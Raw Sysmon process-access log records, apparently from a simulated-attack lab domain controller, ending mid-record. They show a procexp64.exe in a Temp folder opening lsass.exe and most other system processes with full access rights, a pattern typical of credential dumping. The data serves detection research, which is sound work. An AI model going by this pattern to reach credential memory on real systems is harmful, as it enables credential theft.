15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.893{732C744F-3228-6010-C1A2-00000000A301}44125308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.752{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3228-6010-C1A2-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3228-6010-C1A2-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.737{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3228-6010-C1A2-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.738{732C744F-3228-6010-C1A2-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 